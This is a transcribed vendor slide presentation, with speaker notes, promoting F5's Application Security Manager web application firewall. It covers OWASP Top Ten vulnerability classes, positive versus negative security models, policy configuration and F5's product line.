Download presentation
Presentation is loading. Please wait.
Published byMaxence Picard Modified over 6 years ago
1
Web Application Security with the Application Security Manager (ASM)
We recognize that the biggest challenge of any security device is to provide false positives free deployment. When we designed ASM this was a guiding principle. There several factors which provide an easy and smooth deployment: ASM can be deployed in a gradual way, start with a simple policy with low granularity which provide high value from day1, then move to advanced policies with more granularity which provide higher protection level ASM can be loaded with a pre configured security policy which will then could be customized with further application knowledge ASM can run in transparent mode, providing logging for “what if” policy was applied, it can also run in semi transparent mode, where some of the violations categories are in blocking mode and some not (for example, it is very easy to turn on blocking for categories as “Non_RFC requests’ Illegal HTTP response code – this happens when an application is throwing an error; illegal file types) Piotr Oleszkiewicz Zbigniew Skurczynski
2
Agenda Web Security – What are the problems?
Vulnerabilities and protection strategies Websecurity with a Web Application Firewall (WAF) Security Policy Setups About us
3
Application Security: Trends and Drivers
“Webification” of applications Intelligent browsers and applications Public awareness of data security Increasing regulatory requirements The next attackable frontier Targeted attacks Lets start with trends. We see that many applications today are using HTTP as a way to exchange information, these can be legacy client server appliaction in which the clienr is replaced with a web front or these can be new appliactions who would like to take advantage of the new platforms and browsers which are ofering a fast way to develop and a good user experience and accessibility from many devices. On the other hand, as more data is being exposed, the public who uses those web applications is becoming more suspicios to the security aspect of of this accessibility. That leads to governments and other organizations to enfoce standards in which security plays a key aspect, HIPPA, PCI, SOX, The TCP stack and the 100% deployment of network firewalls caused the hackers community to move up the OSI model to layer 7, hackers today attack the web application itself. We see a new trend - Trageted attacks – the revolution which passed on the .com industry is happening today on the security market, if in the past a succesfull attack was to create a worm which will infect millions on web servers in a few hours, or to deface yahoo.com, today, succefull attack will be done under the surface which no one can track or be allerted and there is money behind it. Crime organization are hiring the best hackers.
4
The weakest link Firewall Antivirus Host IDS & Secure OS Network IDS/IPS Applications System Network Access Computer “64% of the 10 million security incidents tracked targeted port 80.” (Information Week magazine) DATA
5
Why Are Web Applications Vulnerable?
Security officers not involved in software developement, while developers are not security conscious New code written to best-practice methodology, but not tested properly New type of attack not protected by current methodology New code written in a hurry due to business pressures Code written by third parties; badly documented, poorly tested – third party not available Flaws in third party infrastructure elements Session-less web applications written with client-server mentality
6
Most web application are vulnerable!
70% of websites at immediate risk of being hacked! - Accunetix – Jan “8 out of 10 websites vulnerable to attack” - WhiteHat “security report – Nov 2006” “75 percent of hacks happen at the application.” - Gartner “Security at the Application Level” “64 percent of developers are not confident in their ability to write secure applications.” - Microsoft Developer Research The battle between hackers and security professionals has moved from the network layer to the Web applications themselves. - Network World
7
www.owasp.org Top Ten Project
A1 – Cross Site Scripting (XSS) XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim’s browser which can hijack user sessions, deface web sites, etc. A2 – Injection Flaws Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker’s hostile data tricks the interpreter into executing unintended commands or changing data. A3 – Insecure Remote File Include Code vulnerable to remote file inclusion allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. A4 – Insecure Direct Object Reference A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization. A5 – Cross Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim’s browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim’s browser to perform a hostile action to the benefit of the attacker. A6 – Information Leakage and Improper Error Handling Applications can unintentionally leak information about their configuration, internal workings, or violate privacy through a variety of application problems. Attackers use this weakness to violate privacy, or conduct further attacks. A7 – Broken Authentication and Session Management Account credentials and session tokens are often not properly protected. Attackers compromise passwords, keys, or authentication tokens to assume other users’ identities. A8 – Insecure Cryptographic Storage Web applications rarely use cryptographic functions properly to protect data and credentials. Attackers use weakly protected data to conduct identity theft and other crimes, such as credit card fraud. A9 – Insecure Communications Applications frequently fail to encrypt network traffic when it is necessary to protect sensitive communications. A10 – Failure to Restrict URL Access Frequently, the only protection for sensitive areas of an application is links or URLs are not presented to unauthorized users. Attackers can use this weakness to access and perform unauthorized operations.
8
Problems are growing Yesterday:
Tens working hours of the best security specialists Preparing a successful attack on the web application was very expensive, but it still could bring profit if the target was interesting enough Today: Automatic and semiautomatic tools that are user friendly Fuzzers (more than 20 Open Source tools alone) Newest trend: evolutionary programming Bottom line – The cost of preparing a successful attack has fallen dramaticaly!!
9
Most web application are vulnerable!
Practical demonstration: - Google - Weak application logic - web browser is the only tool we need
10
Not enough time! The time from findin the vulnerability to launching an attack is falling. Are the applications prepared for ZERO-DAY attacks? Are your applications prepared for ZERO-DAY attacks?
11
Web Application Security
Attacks Now Look To Exploit Application Vulnerabilities ! Non-compliant Information Perimeter Security Is Strong Buffer Overflow Cross-Site Scripting SQL/OS Injection Cookie Poisoning Hidden-Field Manipulation Parameter Tampering Going back - castle PORT 80 PORT 443 ! Forced Access to Information ! Infrastructural Intelligence But Is Open to Web Traffic High Information Density = High Value Attack
12
Web Application Security with ASM
! Unauthorised Access Stops bad requests / responses ! Non-compliant Information ! Unauthorised Access ASM allows legitimate requests ! Infrastructural Intelligence Browser
13
Traditional Security Devices vs. Web Application Firewall (ASM)
X Network Firewall Limited IPS X Limited Partial ASM Known Web Worms Unknown Web Worms Known Web Vulnerabilities Unknown Web Vulnerabilities Illegal Access to Web-server files Forceful Browsing File/Directory Enumerations Buffer Overflow Cross-Site Scripting SQL/OS Injection Cookie Poisoning Hidden-Field Manipulation Parameter Tampering X These are the names of the attacks people generally refer to when they talk about Application Security. Note that it’s all just jargon; everyone has the same list and will claim that they can prevent it all. The real question is: HOW do they prevent it, and can they really prevent these things from happening in real life, in the ways that your applications are vulnerable to? Let me give you a small example…
14
Security Policy in ASM Content Scrubbing Application Cloaking
Definition of Good and Bad Behaviour Enforcement Browser
15
Security Policy in ASM Can be generated automatically or manually
Content Scrubbing Application Cloaking Enforcement Browser Can be generated automatically or manually Highly granular on configuration and blocking Easy to understand and manage Bi-directional: Inbound: protection from generalised & targeted attacks Outbound: content scrubbing & application cloaking Application content & context aware
16
Positive Security - Example
17
Positive Security - Example
Actions not known to be legal can now be blocked - Wrong page order - Invalid parameter - Invalid value - etc. <script>
18
Negative vs. Positive Security
Why is an application firewall able to block a broader range of attacks and do it proactively? The answer is within a positive security model. The reason traditional network security models fail to adequately secure application traffic is their reliance on signatures. Using a bouncer as an example, this is equivalent to given him directions to block people who exhibit attributes meeting known bad behavior. Things such as backwards baseball caps, gang colors, guns, etc. The problem with this approach is that the list must constantly evolve to account for all of the known bad in the world. Every time a new attack or bad behavior is discovered the list must be extended. This approach is always reactionary and always follows the discovery of attacks. The alternative approach to security is to equip the same bouncer with a guest list. Only those people on the guest list are invited in. This is positive security. Positive security learns the application itself and establishes a policy of known-good behavior. Only those things marked as good behavior are allowed in. This list is much shorter and does not need to grow unless the application changes. This prevents any “Zero-Day” attacks from making it through your defenses. In addition to utilizing positive security, the TrafficShield is also stateful. This means if someone attempts to enter the application by changing their id the application will recognize this change and block access. Once the authentication has taken place the positive security model will ensure that no user is able to change their user credentials.
19
Protection for Dynamic Values or Hidden Field Manipulation
20
Selective Application Flow Enforcement
! ALLOWED Username From Acc. $ Amount Password To Acc. Transfer ! VIOLATION ? ! VIOLATION This part of the site is a financial transaction that requires authentication; we should enforce strict flow and parameter validation Should this be a violation? The user may have bookmarked the page! Unnecessarily enforcing flow can lead to false positives.
21
Flexible Policy Granularity
Generic Policies - Policy per object type Low number of policies Quick to implement Requires little change management Can’t take application flow into account Specific Policies – Policy per object High number of policies More time to implement Requires change management policy Can enforce application flow Tightest possible security Protects dynamic values Optimum policy is often a hybrid
22
Flexible Deployment Options
Policy-Building Tools “Trusted IP” Learning Live Traffic Learning Crawler Negative RegEx Template POLICY TIGHTENING SUGGESTIONS OBJECT FLOWS Tighter Security Posture PARAMETER VALUES TrafficShield offers flexible deployment options to provide the security posture demanded by your business requirements. Our standard implementation can be done in as little as one day, providing protection from the most common application attacks, and locking down particular objects or directories which are at risk. TrafficShield’s “Learning” mechanism leverages a suite of tools to provide suggestions for a tighter security policy, allowing customers to increase their security posture only when they are confident that the policy is accurate enough to support it. PARAMETER NAMES Typical ‘standard’ starting point OBJECT NAMES OBJECT TYPES
23
F5 is the Global Leader in Application Delivery Networking
Users Data Centre Application Delivery Network Basic – Network does not exist for ist own sick. Network exists solely to support application running on the top of it We as a network company – what can we do to make those apps running better, means faster, secure, available. Because everything is summing to 3 issues: xxx I think nobody will dispute that ???? Looking at any of these topics, issues, problems in separation is falling … because … what if I xxx This is our unique value proposition: performance, functionality, unique integration At Home In the Office On the Road Oracle Siebel SAP Business goal: Achieve these objectives in the most operationally efficient manner
24
F5’s Comprehensive Single Solution
Users The F5 Solution Applications Application Delivery Network CRM Database Siebel BEA Legacy .NET SAP PeopleSoft IBM ERP SFA Custom Mobile Phone Message – If you do not address this issue effectively with the big picture in mind, you are setting yourself up for failure down the road. You’ve got this incredible demand for applications. Not only more applications but more ways to reach them. In trying to satisfy these demands, enteprises are taking shortsighted approaches. As a result, networks are becoming increasingly more complex and the problem is just getting worse. PDA Laptop Desktop TMOS Co-location
25
The F5 Products & Modules
International Data Center BIG-IP Global Traffic Manager HTTP /HTML, SIP, RTP, SRTP, RTCP, SMTP, FTP, SFTP, RTSP, SQL, CIFS, MAPI, IIOP, SOAP, XML etc… Microsoft SAP Oracle IBM BEA TMOS BIG-IP Link Controller WANJet BIG-IP Local Traffic Manager BIG-IP Web Accelerator FirePass BIG-IP Application Security Manager Enterprise Manager iControl & iRules
26
Unique TMOS Architecture
ASM /TrafficShield Web Accel 3rd Party Microkernel TCP Proxy Rate Shaping TCP Express SSL Caching XML Compression OneConnect TCP Express Client Side Server Side Client Server 68: They want BIG-IP to rewrite the URL based on the destination node selected by the load balancing algs. This may be a fairly small # of code lines to change, but the number of corner cases (e.g. dropped packet recovery, combining with other features, UI) is huge. This needs to work “in the real world”. It would be a lot easier to do in HSIBJ. 86 - Two parts to this: first is the ability to utilize the known protocol to know when to separate each request; second is to implement that in a one-connect-like way, so that load balancing the many requests from the one connection properly go to their respective servers. 98 - BIG-IP won't work because the initial handshake needs to occur before the client tells the BIG-IP what it's looking for. iRules High Performance HW iControl API TMOS Traffic Plug-ins High-Performance Networking Microkernel Powerful Application Protocol Support iControl – External Monitoring and Control iRules – Network Programming Language
27
BIG-IP Software Add-On Modules Quickly Adapt to Changing Application & Business Challenges
Compression Module Increase performance Fast Cache Module Offload servers Rate Shaping Module Reserve bandwidth
28
BIG-IP Security Add-On Modules
Application Security Module Protect applications and data SSL Acceleration Protect data over the Internet Advanced Client Authentication Module Protect against unauthorised access
29
ASM Platform Availability
Standalone ASM on TMOS 4100 Available as a module with BIG-IP LTM 6400/6800 8400/8800 On BigIP LTM or GTM, the ASM is available just by a license upgrade, once you have that license, you simply route the traffic of a specific VIPs into the ASM. The difference between standalone- ASM and ASM Module is that the standalone is unable to load balance pool members.
30
Analyst Leadership Position
Challengers Leaders Niche Players Visionaries Ability to Execute Completeness of Vision Magic Quadrant for Application Delivery Products, 2007 F5 Networks F5 Strengths Offers the most feature-rich AP ADC, combined with excellent performance and programmability via iRules and a broad product line. Strong focus on applications, including long-term relationships with major application vendors, including Microsoft, Oracle and SAP. Strong balance sheet and cohesive management team with a solid track record for delivering the right products at the right time. Strong underlying platform allows easy extensibility to add features. Support of an increasingly loyal and large group of active developers tuning their applications environments specifically with F5 infrastructure. Citrix Systems Cisco Systems Akamai Technologies Foundry Networks Cresendo Nortel Networks Radware Juniper Coyote Point Zeus NetContinuum Array Networks Source: Gartner, January 2007 30
31
F5 Customers in EMEA (1 of 2)
Banking, Financial Insurance, Investments Telco, Service Providers, Mobile
32
F5 Customers in EMEA (2 of 2)
Transport, Travel Media, Technology, Online Manufact., Energy Governm., Other Health, Consumer
33
Summary Protecting web application is a challenge within many organizations but attacks against web applications are the hackers favorites ASM provides easy and very granular configuration options to protect web applications and to eliminate false positives ASM combines positive and negative security models to achieve the optimum security ASM is an integrated solution and can run as a module on BIG-IP or standalone ASM is used to provide compliance with various standards ASM provides hidden parameter protection and selective flow control enforcement ASM provides an additional security layer or can be used as central point for web application security enforcement We recognize that the biggest challenge of any security device is to provide false positives free deployment. When we designed ASM this was a guiding principle. There several factors which provide an easy and smooth deployment: ASM can be deployed in a gradual way, start with a simple policy with low granularity which provide high value from day1, then move to advanced policies with more granularity which provide higher protection level ASM can be loaded with a pre configured security policy which will then could be customized with further application knowledge ASM can run in transparent mode, providing logging for “what if” policy was applied, it can also run in semi transparent mode, where some of the violations categories are in blocking mode and some not (for example, it is very easy to turn on blocking for categories as “Non_RFC requests’ Illegal HTTP response code – this happens when an application is throwing an error; illegal file types)
34
Evaluation The best way to see how it will perform in Your environment with Your applications Soft-Tronik can provide you with evaluation hardware and engineers to help in deployment
36
Back up Sliedes
37
Company Snapshot Facts Position References
38
F5’s Continued Success Revenue Headquartered in Seattle, WA
F5 Ensures Applications Running Over the Network Are Always Secure, Fast, and Available Founded 1996 / Public 1999 Over 10,000 customers and 30,000 systems installed Over 1100 Employees NASDAQ: FFIV
Similar presentations
© 2025 SlidePlayer.com Inc.
All rights reserved.